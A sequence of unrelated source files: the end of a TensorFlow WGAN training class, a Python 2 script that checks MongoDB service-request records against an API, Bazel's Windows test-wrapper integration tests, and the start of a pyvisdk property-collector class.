x_in_representations[i], x_gen_representations[i]
)
c_interpolation = wgan.get_interpolation(c_in, c_gen_in)
g_loss_i, d_loss_i = self.fn_compute_loss(
self.discriminator[i], d_real, d_fake, x_interpolation, c_interpolation
)
g_loss += self.discriminator[i].weighting * g_loss_i
if train_discriminator:
gradients_of_discriminator = disc_tape.gradient(
d_loss_i, self.discriminator[i].trainable_variables
)
self.discriminator_optimizer.apply_gradients(
zip(gradients_of_discriminator, self.discriminator[i].trainable_variables)
)
if train_generator:
gradients_of_generator = gen_tape.gradient(
g_loss, self.generator.trainable_variables
)
self.generator_optimizer.apply_gradients(
zip(gradients_of_generator, self.generator.trainable_variables)
)
def _get_training_dataset(self):
"""Function gives the dataset to use during training.
In this case, returns the joint data/conditioning dataset
with random conditioning information.
Returns:
A tf.Data dataset object for model training.
"""
return tf.data.Dataset.zip((self.conditioned_dataset, self.dataset))
def _generate_and_save_examples(self, epoch):
"""Generates a batch of fake samples and saves them, along with
a batch of real data for comparason. Calls the given fn_save_examples.
Args:
epoch: The current epoch, added as a post-fix of the file
name.
"""
if self.fn_save_examples:
z_in = tf.random.uniform((self.batch_size, self.z_dim), -1, 1)
x_save = self.raw_x_dataset[0:self.batch_size]
c_save = self.raw_dataset[0:self.batch_size]
generations = tf.squeeze(self.generator(z_in, c_save, training=False))
self.fn_save_examples(epoch, x_save, generations)
|
|
import csv
import traceback
import logging
from pymongo import MongoClient
import datetime
from Queue import Queue
from utilsDataFile import Utils
import json
from threading import Thread
from colorama import init
init(autoreset=True)
__author__ = 'asifj'
logging.basicConfig(
format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',
level=logging.INFO
)
SR = 0
KBLINKS = 0
ATTACHMENTS = 1
DOCUMENT_NO = 0
DOCUMENT_NO_END = 0
def worker_func_sr(utils, queue, output_writer, response_writer):
while True:
data = queue.get()
document = data[0]
document_no = data[1]
startTime = data[2]
output = ""
try:
output += utils.header(document, document_no, "SRID")
response = utils.request(document, "SRID")
output += "\n*******************************************"
output += "\nVerifying srDetails..."
output += "\n*******************************************"
output += utils.validate_sr_details(response, document, document_no, startTime, response_writer)
client = MongoClient('10.219.48.134', 27017)
db = client['ImportedEvents']
collection_new = db['srKbLink-new']
key = {'caseId': document['SRID']}
document_kbLinks = collection_new.find_one({'caseId': document['SRID']})
res = json.loads(response.text)
output += "\n\n\n*******************************************"
output += "\nVerifying kbLinks..."
output += "\n*******************************************"
if document_kbLinks is None:
output += "\n No kblinks found in document"
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += "\n kbLinks found in response"
else:
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += utils.validate_kb_links(response, document_kbLinks, document_no, startTime, response_writer)
output += utils.footer(output)
output_writer.write(output)
output = ""
except Exception:
print Exception.message
print "CaseId: "+str(document['SRID'])
print(traceback.format_exc())
print "\nProcessing completed document no: "+str(document_no)
queue.task_done()
def worker_func_kblinks(utils, queue, output_writer, response_writer):
while True:
data = queue.get()
document = data[0]
document_no = data[1]
startTime = data[2]
output = ""
try:
output += utils.header(document, document_no, "caseId")
response = utils.request(document, "caseId")
res = json.loads(response.text)
output += "\n\n\n*******************************************"
output += "\nVerifying kbLinks..."
output += "\n*******************************************"
if document is None:
output += "\n No kblinks found in document"
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += "\n kbLinks found in response"
else:
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += utils.validate_kb_links(response, document, document_no, startTime, response_writer)
output += utils.footer(output)
output_writer.write(output)
output = ""
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nProcessing completed document no: "+str(document_no)
queue.task_done()
def worker_func_attachments(utils, queue, output_writer, response_writer):
while True:
data = queue.get()
document = data[0]
document_no = data[1]
startTime = data[2]
output = ""
try:
output += utils.header(document, document_no, "caseId")
response = utils.request(document, "caseId")
res = json.loads(response.text)
output += "\n\n\n*******************************************"
output += "\nVerifying attachments..."
output += "\n*******************************************"
if document is None:
output += "\n No attachments found in document"
if not res['kbLinks']:
output += "\n No attachments found in response"
else:
output += "\n attachments found in response"
else:
if not res['attachments']:
output += "\n No attachments found in response"
else:
output += utils.validate_sr_attachments(response, document, document_no, startTime, response_writer)
output += utils.footer(output)
output_writer.write(output)
output = ""
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nProcessing completed document no: "+str(document_no)
queue.task_done()
if SR == 1:
client = MongoClient('10.219.48.134', 27017)
#client = MongoClient('192.168.56.101', 27017)
db = client['ImportedEvents']
collection = db['srDetails']
documents = collection.find(no_cursor_timeout=True)[DOCUMENT_NO:DOCUMENT_NO_END]
#documents = collection.find({'caseId':'2011-0525-T-0334'})
ofile = open('DateFileVerificationDetails-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.csv', "wb")
response_writer = csv.writer(ofile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
row = ["SNo", "RequestTime", "CaseID", "KafkaJSON", "APIResponseStatus", "Elapsed", "DataStatus", "TimeTakenToCompleteRequestNProcess"]
response_writer.writerow(row)
threads = []
output_writer = open('DateFileVerificationMatch-Output-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.txt', "wb")
enclosure_queue = Queue()
utils = Utils()
# Set up some threads to fetch the enclosures
for i in range(100):
worker = Thread(target=worker_func_sr, args=(utils, enclosure_queue, output_writer, response_writer))
worker.setDaemon(True)
worker.setName("Thread-"+str(i))
worker.start()
# Download the feed(s) and put the enclosure URLs into the queue.
for document in documents:
DOCUMENT_NO += 1
try:
data = [document, DOCUMENT_NO, datetime.datetime.now()]
enclosure_queue.put(data)
except Exception:
print Exception.message
print "CaseId: "+str(document['SRID'])
print(traceback.format_exc())
print "\nDocuments in queue: "+str(enclosure_queue.qsize())
# Now wait for the queue to be empty, indicating that we have processed all of the downloads.
print '*** Main thread waiting'
enclosure_queue.join()
print '*** Done'
if KBLINKS == 1:
client = MongoClient('10.219.48.134', 27017)
#client = MongoClient('192.168.56.101', 27017)
db = client['ImportedEvents']
collection = db['srKbLink-new']
documents = collection.find(no_cursor_timeout=True)[DOCUMENT_NO:DOCUMENT_NO_END]
#documents = collection.find({'caseId':'2011-0525-T-0334'})
ofile = open('reports/srkblinks/DateFileVerificationDetails-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.csv', "wb")
response_writer = csv.writer(ofile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
row = ["SNo", "RequestTime", "CaseID", "KafkaJSON", "APIResponseStatus", "Elapsed", "DataStatus", "TimeTakenToCompleteRequestNProcess"]
response_writer.writerow(row)
threads = []
output_writer = open('reports/srkblinks/DateFileVerificationMatch-Output-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.txt', "wb")
enclosure_queue = Queue()
utils = Utils()
# Set up some threads to fetch the enclosures
for i in range(10):
worker = Thread(target=worker_func_kblinks, args=(utils, enclosure_queue, output_writer, response_writer))
worker.setDaemon(True)
worker.setName("Thread-"+str(i))
worker.start()
# Download the feed(s) and put the enclosure URLs into the queue.
for document in documents:
DOCUMENT_NO += 1
try:
data = [document, DOCUMENT_NO, datetime.datetime.now()]
enclosure_queue.put(data)
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nDocuments in queue: "+str(enclosure_queue.qsize())
# Now wait for the queue to be empty, indicating that we have processed all of the downloads.
print '*** Main thread waiting'
enclosure_queue.join()
print '*** Done'
if ATTACHMENTS == 1:
client = MongoClient('10.219.48.134', 27017)
#client = MongoClient('192.168.56.101', 27017)
db = client['ImportedEvents']
collection = db['srAttachements-new']
documents = collection.find(no_cursor_timeout=True)[DOCUMENT_NO:DOCUMENT_NO_END]
#documents = collection.find({'caseId':'2011-0525-T-0334'})
ofile = open('reports/srAttachements/DateFileVerificationDetails-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.csv', "wb")
response_writer = csv.writer(ofile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
row = ["SNo", "RequestTime", "CaseID", "KafkaJSON", "APIResponseStatus", "Elapsed", "DataStatus", "TimeTakenToCompleteRequestNProcess"]
response_writer.writerow(row)
threads = []
output_writer = open('reports/srAttachements/DateFileVerificationMatch-Output-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.txt', "wb")
enclosure_queue = Queue()
utils = Utils()
# Set up some threads to fetch the enclosures
for i in range(10):
worker = Thread(target=worker_func_attachments, args=(utils, enclosure_queue, output_writer, response_writer))
worker.setDaemon(True)
worker.setName("Thread-"+str(i))
worker.start()
# Download the feed(s) and put the enclosure URLs into the queue.
for document in documents:
DOCUMENT_NO += 1
try:
data = [document, DOCUMENT_NO, datetime.datetime.now()]
enclosure_queue.put(data)
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nDocuments in queue: "+str(enclosure_queue.qsize())
# Now wait for the queue to be empty, indicating that we have processed all of the downloads.
print '*** Main thread waiting'
enclosure_queue.join()
print '*** Done'
|
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import zipfile
from src.test.py.bazel import test_base
class TestWrapperTest(test_base.TestBase):
@staticmethod
def _ReadFile(path):
# Read the runfiles manifest.
contents = []
with open(path, 'rt') as f:
contents = [line.strip() for line in f.readlines()]
return contents
def _FailWithOutput(self, output):
self.fail('FAIL:\n | %s\n---' % '\n | '.join(output))
def _CreateMockWorkspace(self):
self.CreateWorkspaceWithDefaultRepos('WORKSPACE')
self.ScratchFile('foo/BUILD', [
'load(":native_test.bzl", "bat_test", "exe_test")',
'bat_test(',
' name = "passing_test",',
' content = ["@exit /B 0"],',
')',
'bat_test(',
' name = "failing_test",',
' content = ["@exit /B 1"],',
')',
'bat_test(',
' name = "printing_test",',
' content = [',
' "@echo lorem ipsum",',
' "@echo HOME=%HOME%",',
' "@echo TEST_SRCDIR=%TEST_SRCDIR%",',
' "@echo TEST_TMPDIR=%TEST_TMPDIR%",',
' "@echo USER=%USER%",',
' ]',
')',
'bat_test(',
' name = "runfiles_test",',
' content = [',
' "@echo off",',
' "echo MF=%RUNFILES_MANIFEST_FILE%",',
' "echo ONLY=%RUNFILES_MANIFEST_ONLY%",',
' "echo DIR=%RUNFILES_DIR%",',
' "echo data_path=%1",',
' "if exist %1 (echo data_exists=1) else (echo data_exists=0)",',
' ],',
' data = ["dummy.dat"],',
' args = ["$(location dummy.dat)"],',
')',
'bat_test(',
' name = "sharded_test",',
' content = [',
' "@echo STATUS=%TEST_SHARD_STATUS_FILE%",',
' "@echo INDEX=%TEST_SHARD_INDEX% TOTAL=%TEST_TOTAL_SHARDS%",',
' ],',
' shard_count = 2,',
')',
'bat_test(',
' name = "unexported_test",',
' content = [',
' "@echo GOOD=%HOME%",',
' "@echo BAD=%TEST_UNDECLARED_OUTPUTS_MANIFEST%",',
' ],',
')',
'exe_test(',
' name = "testargs_test",',
' src = "testargs.exe",',
r' args = ["foo", "a b", "", "\"c d\"", "\"\"", "bar"],',
')',
'py_test(',
' name = "undecl_test",',
' srcs = ["undecl_test.py"],',
' data = ["dummy.ico", "dummy.dat"],',
' deps = ["@bazel_tools//tools/python/runfiles"],',
')',
'py_test(',
' name = "annot_test",',
' srcs = ["annot_test.py"],',
')',
'py_test(',
' name = "xml_test",',
' srcs = ["xml_test.py"],',
')',
'py_test(',
' name = "xml2_test",',
' srcs = ["xml2_test.py"],',
')',
])
self.CopyFile(
src_path=self.Rlocation('io_bazel/src/test/py/bazel/printargs.exe'),
dst_path='foo/testargs.exe',
executable=True)
# A single white pixel as an ".ico" file. /usr/bin/file should identify this
# as "image/x-icon".
# The MIME type lookup logic of the test wrapper only looks at file names,
# but the test-setup.sh calls /usr/bin/file which inspects file contents, so
# we need a valid ".ico" file.
ico_file = bytearray([
0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00,
0x18, 0x00, 0x30, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x28, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00,
0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00
])
# 16 bytes of random data. /usr/bin/file should identify this as
# "application/octet-stream".
# The MIME type lookup logic of the test wrapper only looks at file names,
# but the test-setup.sh calls /usr/bin/file which inspects file contents, so
# we need a valid ".ico" file.
dat_file = bytearray([
0x40, 0x5a, 0x2e, 0x7e, 0x53, 0x86, 0x98, 0x0e, 0x12, 0xc4, 0x92, 0x38,
0x27, 0xcd, 0x09, 0xf9
])
ico_file_path = self.ScratchFile('foo/dummy.ico').replace('/', '\\')
dat_file_path = self.ScratchFile('foo/dummy.dat').replace('/', '\\')
with open(ico_file_path, 'wb') as f:
f.write(ico_file)
with open(dat_file_path, 'wb') as f:
f.write(dat_file)
self.CopyFile(
src_path=self.Rlocation('io_bazel/src/test/py/bazel/native_test.bzl'),
dst_path='foo/native_test.bzl')
self.ScratchFile(
'foo/undecl_test.py', [
'from bazel_tools.tools.python.runfiles import runfiles',
'import os',
'import shutil',
'',
'root = os.environ.get("TEST_UNDECLARED_OUTPUTS_DIR")',
'os.mkdir(os.path.join(root, "out1"))',
'os.mkdir(os.path.join(root, "out2"))',
'os.makedirs(os.path.join(root, "empty/sub"))',
'r = runfiles.Create()',
'shutil.copyfile(r.Rlocation("__main__/foo/dummy.ico"),',
' os.path.join(root, "out1", "data1.ico"))',
'shutil.copyfile(r.Rlocation("__main__/foo/dummy.dat"),',
' os.path.join(root, "out2", "my data 2.dat"))',
],
executable=True)
self.ScratchFile(
'foo/annot_test.py', [
'import os',
'root = os.environ.get("TEST_UNDECLARED_OUTPUTS_ANNOTATIONS_DIR")',
'dir1 = os.path.join(root, "out1")',
'dir2 = os.path.join(root, "out2.part")',
'os.mkdir(dir1)',
'os.mkdir(dir2)',
'with open(os.path.join(root, "a.part"), "wt") as f:',
' f.write("Hello a")',
'with open(os.path.join(root, "b.txt"), "wt") as f:',
' f.write("Hello b")',
'with open(os.path.join(root, "c.part"), "wt") as f:',
' f.write("Hello c")',
'with open(os.path.join(dir1, "d.part"), "wt") as f:',
' f.write("Hello d")',
'with open(os.path.join(dir2, "e.part"), "wt") as f:',
' f.write("Hello e")',
],
executable=True)
self.ScratchFile(
'foo/xml_test.py', [
'from __future__ import print_function',
'import time',
'import sys',
'print("stdout_line_1")',
'print("stdout_line_2")',
'time.sleep(2)',
'print("stderr_line_1", file=sys.stderr)',
'print("stderr_line_2", file=sys.stderr)',
],
executable=True)
self.ScratchFile(
'foo/xml2_test.py', [
'import os',
'with open(os.environ.get("XML_OUTPUT_FILE"), "wt") as f:',
' f.write("leave this")'
],
executable=True)
def _AssertPassingTest(self, flags):
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:passing_test',
'-t-',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
def _AssertFailingTest(self, flags):
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:failing_test',
'-t-',
] + flags)
self.AssertExitCode(exit_code, 3, stderr)
def _AssertPrintingTest(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:printing_test',
'-t-',
'--test_output=all',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
lorem = False
for line in stderr + stdout:
if line.startswith('lorem ipsum'):
lorem = True
elif line.startswith('HOME='):
home = line[len('HOME='):]
elif line.startswith('TEST_SRCDIR='):
srcdir = line[len('TEST_SRCDIR='):]
elif line.startswith('TEST_TMPDIR='):
tmpdir = line[len('TEST_TMPDIR='):]
elif line.startswith('USER='):
user = line[len('USER='):]
if not lorem:
self._FailWithOutput(stderr + stdout)
if not home:
self._FailWithOutput(stderr + stdout)
if not os.path.isabs(home):
self._FailWithOutput(stderr + stdout)
if not os.path.isdir(srcdir):
self._FailWithOutput(stderr + stdout)
if not os.path.isfile(os.path.join(srcdir, 'MANIFEST')):
self._FailWithOutput(stderr + stdout)
if not os.path.isabs(srcdir):
self._FailWithOutput(stderr + stdout)
if not os.path.isdir(tmpdir):
self._FailWithOutput(stderr + stdout)
if not os.path.isabs(tmpdir):
self._FailWithOutput(stderr + stdout)
if not user:
self._FailWithOutput(stderr + stdout)
def _AssertRunfiles(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:runfiles_test',
'-t-',
'--test_output=all',
# Ensure Bazel does not create a runfiles tree.
'--enable_runfiles=no',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
mf = mf_only = rf_dir = path = exists = None
for line in stderr + stdout:
if line.startswith('MF='):
mf = line[len('MF='):]
elif line.startswith('ONLY='):
mf_only = line[len('ONLY='):]
elif line.startswith('DIR='):
rf_dir = line[len('DIR='):]
elif line.startswith('data_path='):
path = line[len('data_path='):]
elif line.startswith('data_exists='):
exists = line[len('data_exists='):]
if mf_only != '1':
self._FailWithOutput(stderr + stdout)
if not os.path.isfile(mf):
self._FailWithOutput(stderr + stdout)
mf_contents = TestWrapperTest._ReadFile(mf)
# Assert that the data dependency is listed in the runfiles manifest.
if not any(
line.split(' ', 1)[0].endswith('foo/dummy.dat')
for line in mf_contents):
self._FailWithOutput(mf_contents)
if not os.path.isdir(rf_dir):
self._FailWithOutput(stderr + stdout)
if not path:
# Expect the $(location) expansion in 'args' worked
self._FailWithOutput(stderr + stdout)
if exists != '0':
# Runfiles are disabled, expect the runfile symlink to be missing.
self._FailWithOutput(stderr + stdout)
def _AssertRunfilesSymlinks(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:runfiles_test',
'-t-',
'--test_output=all',
# Ensure Bazel creates a runfiles tree.
'--enable_runfiles=yes',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
mf_only = rf_dir = path = exists = None
for line in stderr + stdout:
if line.startswith('ONLY='):
mf_only = line[len('ONLY='):]
elif line.startswith('DIR='):
rf_dir = line[len('DIR='):]
elif line.startswith('data_path='):
path = line[len('data_path='):]
elif line.startswith('data_exists='):
exists = line[len('data_exists='):]
if mf_only == '1':
self._FailWithOutput(stderr + stdout)
if not rf_dir or not os.path.isdir(rf_dir):
self._FailWithOutput(stderr + stdout)
if not path:
# Expect the $(location) expansion in 'args' worked
self._FailWithOutput(stderr + stdout)
if exists != '1':
# Runfiles are enabled, expect the runfile symlink to exist.
self._FailWithOutput(stderr + stdout)
def _AssertShardedTest(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:sharded_test',
'-t-',
'--test_output=all',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
status = None
index_lines = []
for line in stderr + stdout:
if line.startswith('STATUS='):
status = line[len('STATUS='):]
elif line.startswith('INDEX='):
index_lines.append(line)
if not status:
self._FailWithOutput(stderr + stdout)
# Test test-setup.sh / test wrapper only ensure that the directory of the
# shard status file exist, not that the file itself does too.
if not os.path.isdir(os.path.dirname(status)):
self._FailWithOutput(stderr + stdout)
if sorted(index_lines) != ['INDEX=0 TOTAL=2', 'INDEX=1 TOTAL=2']:
self._FailWithOutput(stderr + stdout)
def _AssertUnexportsEnvvars(self, flags):
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:unexported_test',
'-t-',
'--test_output=all',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
good = bad = None
for line in stderr + stdout:
if line.startswith('GOOD='):
good = line[len('GOOD='):]
elif line.startswith('BAD='):
bad = line[len('BAD='):]
if not good or bad:
self._FailWithOutput(stderr + stdout)
def _AssertTestArgs(self, flags):
exit_code, bazel_bin, stderr = self.RunBazel(['info', 'bazel-bin'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_bin = bazel_bin[0]
exit_code, stdout, stderr = self.RunBazel([
'test',
'//foo:testargs_test',
'-t-',
'--test_output=all',
'--test_arg=baz',
'--test_arg="x y"',
'--test_arg=""',
'--test_arg=qux',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
actual = []
for line in stderr + stdout:
if line.startswith('arg='):
actual.append(str(line[len('arg='):]))
self.assertListEqual(
[
'(foo)',
# TODO(laszlocsomor): assert that "a b" is passed as one argument,
# not two, after https://github.com/bazelbuild/bazel/issues/6277
# is fixed.
'(a)',
'(b)',
# TODO(laszlocsomor): assert that the empty string argument is
# passed, after https://github.com/bazelbuild/bazel/issues/6276
# is fixed.
'(c d)',
'()',
'(bar)',
'(baz)',
'("x y")',
'("")',
'(qux)',
],
actual)
def _AssertUndeclaredOutputs(self, flags):
exit_code, bazel_testlogs, stderr = self.RunBazel(
['info', 'bazel-testlogs'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_testlogs = bazel_testlogs[0]
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:undecl_test',
'-t-',
'--test_output=errors',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
undecl_zip = os.path.join(bazel_testlogs, 'foo', 'undecl_test',
'test.outputs', 'outputs.zip')
self.assertTrue(os.path.exists(undecl_zip))
zip_content = {}
with zipfile.ZipFile(undecl_zip, 'r') as z:
zip_content = {f: z.getinfo(f).file_size for f in z.namelist()}
self.assertDictEqual(
zip_content, {
'out1/': 0,
'out2/': 0,
'empty/': 0,
'empty/sub/': 0,
'out1/data1.ico': 70,
'out2/my data 2.dat': 16
})
undecl_mf = os.path.join(bazel_testlogs, 'foo', 'undecl_test',
'test.outputs_manifest', 'MANIFEST')
self.assertTrue(os.path.exists(undecl_mf))
mf_content = []
with open(undecl_mf, 'rt') as f:
mf_content = [line.strip() for line in f.readlines()]
# Using an ".ico" file as example, because as of 2018-11-09 Bazel's CI
# machines run Windows Server 2016 core which recognizes fewer MIME types
# than desktop Windows versions, and one of the recognized types is ".ico"
# files.
# Update(2019-03-05): apparently this MIME type is now recognized on CI as
# as "image/vnd.microsoft.icon". The standard MIME type is "image/x-icon",
# but Wikipedia lists a few alterantive ones, so the test will accept all of
# them.
if len(mf_content) != 2:
self._FailWithOutput(mf_content)
tokens = mf_content[0].split('\t')
if (len(tokens) != 3 or tokens[0] != 'out1/data1.ico' or
tokens[1] != '70' or tokens[2] not in [
'image/x-icon', 'image/vnd.microsoft.icon', 'image/ico',
'image/icon', 'text/ico', 'application/ico'
]):
self._FailWithOutput(mf_content)
if mf_content[1] != 'out2/my data 2.dat\t16\tapplication/octet-stream':
self._FailWithOutput(mf_content)
def _AssertUndeclaredOutputsAnnotations(self, flags):
exit_code, bazel_testlogs, stderr = self.RunBazel(
['info', 'bazel-testlogs'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_testlogs = bazel_testlogs[0]
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:annot_test',
'-t-',
'--test_output=errors',
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
undecl_annot = os.path.join(bazel_testlogs, 'foo', 'annot_test',
'test.outputs_manifest', 'ANNOTATIONS')
self.assertTrue(os.path.exists(undecl_annot))
annot_content = []
with open(undecl_annot, 'rt') as f:
annot_content = [line.strip() for line in f.readlines()]
self.assertListEqual(annot_content, ['Hello aHello c'])
def _AssertXmlGeneration(self, flags, split_xml=False):
exit_code, bazel_testlogs, stderr = self.RunBazel(
['info', 'bazel-testlogs'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_testlogs = bazel_testlogs[0]
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:xml_test',
'-t-',
'--test_output=errors',
'--%sexperimental_split_xml_generation' % ('' if split_xml else 'no'),
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
test_xml = os.path.join(bazel_testlogs, 'foo', 'xml_test', 'test.xml')
self.assertTrue(os.path.exists(test_xml))
duration = 0
xml_contents = []
stdout_lines = []
stderr_lines = []
with open(test_xml, 'rt') as f:
xml_contents = [line.strip() for line in f]
for line in xml_contents:
if 'duration=' in line:
line = line[line.find('duration="') + len('duration="'):]
line = line[:line.find('"')]
duration = int(line)
elif 'stdout_line' in line:
stdout_lines.append(line)
elif 'stderr_line' in line:
stderr_lines.append(line)
# Since stdout and stderr of the test are redirected to the same file, it's
# possible that a line L1 written to stdout before a line L2 written to
# stderr is dumped to the file later, i.e. the file will have lines L2 then
# L1. It is however true that lines printed to the same stream (stdout or
# stderr) have to preserve their ordering, i.e. if line L3 is printed to
# stdout after L1, then it must be strictly ordered after L1 (but not
# necessarily after L2).
# Therefore we only assert partial ordering of lines.
if duration <= 1:
self._FailWithOutput(xml_contents)
if (len(stdout_lines) != 2 or 'stdout_line_1' not in stdout_lines[0] or
'stdout_line_2' not in stdout_lines[1]):
self._FailWithOutput(xml_contents)
if (len(stderr_lines) != 2 or 'stderr_line_1' not in stderr_lines[0] or
'stderr_line_2' not in stderr_lines[1]):
self._FailWithOutput(xml_contents)
def _AssertXmlGeneratedByTestIsRetained(self, flags, split_xml=False):
exit_code, bazel_testlogs, stderr = self.RunBazel(
['info', 'bazel-testlogs'])
self.AssertExitCode(exit_code, 0, stderr)
bazel_testlogs = bazel_testlogs[0]
exit_code, _, stderr = self.RunBazel([
'test',
'//foo:xml2_test',
'-t-',
'--test_output=errors',
'--%sexperimental_split_xml_generation' % ('' if split_xml else 'no'),
] + flags)
self.AssertExitCode(exit_code, 0, stderr)
test_xml = os.path.join(bazel_testlogs, 'foo', 'xml2_test', 'test.xml')
self.assertTrue(os.path.exists(test_xml))
xml_contents = []
with open(test_xml, 'rt') as f:
xml_contents = [line.strip() for line in f.readlines()]
self.assertListEqual(xml_contents, ['leave this'])
# Test that the native test wrapper can run tests from external repositories.
# See https://github.com/bazelbuild/bazel/issues/8088
# Unfortunately as of 2019-04-18 the legacy test wrapper (test-setup.sh) also
# has this bug, but I (@laszlocsomor) work on enabling the native test wrapper
# by default so fixing the legacy one seems to make little sense.
def testRunningTestFromExternalRepo(self):
rule_definition = [
'load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")',
'local_repository(name = "a", path = "a")'
]
rule_definition.extend(self.GetDefaultRepoRules())
self.ScratchFile('WORKSPACE', rule_definition)
self.CreateWorkspaceWithDefaultRepos('a/WORKSPACE')
self.ScratchFile('BUILD', ['py_test(name = "x", srcs = ["x.py"])'])
self.ScratchFile('a/BUILD', ['py_test(name = "x", srcs = ["x.py"])'])
self.ScratchFile('x.py')
self.ScratchFile('a/x.py')
for flag in ['--legacy_external_runfiles', '--nolegacy_external_runfiles']:
for target in ['//:x', '@a//:x']:
exit_code, _, stderr = self.RunBazel([
'test',
'-t-',
'--incompatible_windows_native_test_wrapper',
'--shell_executable=',
'--test_output=errors',
'--verbose_failures',
flag,
target,
])
self.AssertExitCode(
exit_code, 0,
['flag=%s' % flag, 'target=%s' % target] + stderr)
def _RunTests(self, flags):
self._CreateMockWorkspace()
flags = ['--noincompatible_windows_native_test_wrapper']
self._AssertPassingTest(flags)
self._AssertFailingTest(flags)
self._AssertPrintingTest(flags)
self._AssertRunfiles(flags)
self._AssertRunfilesSymlinks(flags)
self._AssertShardedTest(flags)
self._AssertUnexportsEnvvars(flags)
self._AssertTestArgs(flags)
self._AssertUndeclaredOutputs(flags)
self._AssertUndeclaredOutputsAnnotations(flags)
self._AssertXmlGeneration(flags, split_xml=False)
self._AssertXmlGeneration(flags, split_xml=True)
self._AssertXmlGeneratedByTestIsRetained(flags, split_xml=False)
self._AssertXmlGeneratedByTestIsRetained(flags, split_xml=True)
def testTestExecutionWithTestSetupSh(self):
self._RunTests(['--noincompatible_windows_native_test_wrapper'])
def testTestExecutionWithTestWrapperExe(self):
self._RunTests(
['--incompatible_windows_native_test_wrapper', '--shell_executable='])
if __name__ == '__main__':
unittest.main()
|
|
from infi.pyutils.lazy import cached_method
from pyvisdk.do.traversal_spec import TraversalSpec
from pyvisdk.do.selection_spec import SelectionSpec
from pyvisdk.do.wait_options import WaitOptions
from logging import getLogger
from re import match, findall
from bunch import Bunch
logger = getLogger(__name__)
INITIAL_VERSION = ''
# foo.bar
# foo.arProp["key val"]
# foo.arProp["key val"].baz
PROPERTY_NAME_PATTERN = r'\w+|\["[^"\]]+"\]'
class CachedPropertyCollector(object):
"""
Facade for using PropertyCollectors to fetch a list of properties from all instances of a specific object_type
:param vim: :py:class:`Vim` instance
:param managedObjectTypeName: A name of managed object type, e.g. HostSystem
:param propertiesList: A list of properties to fetch, can be nested, e.g. config.storageDevice
"""
def __init__(self, vim, managedObjectTypeName, propertiesList):
super(CachedPropertyCollector, self).__init__()
self._vim = vim
self._managedObjectTypeName = managedObjectTypeName
self._propertiesList = propertiesList
self._version = INITIAL_VERSION
self._result = {}
def __repr__(self):
args = (self.__class__.__name__, getattr(self, '_managedObjectTypeName', None),
getattr(self, '_propertiesList', []), getattr(self, '_version', repr('')))
return "<{}: objectType={!r}, properties={!r}, version={}>".format(*args)
def _guessTraversalSpecName(self, managed_object_type_name, property_name):
""":returns: A guessable name of a TraversalSpec being used in this facade"""
name = "{}.{}".format(managed_object_type_name, property_name)
return name
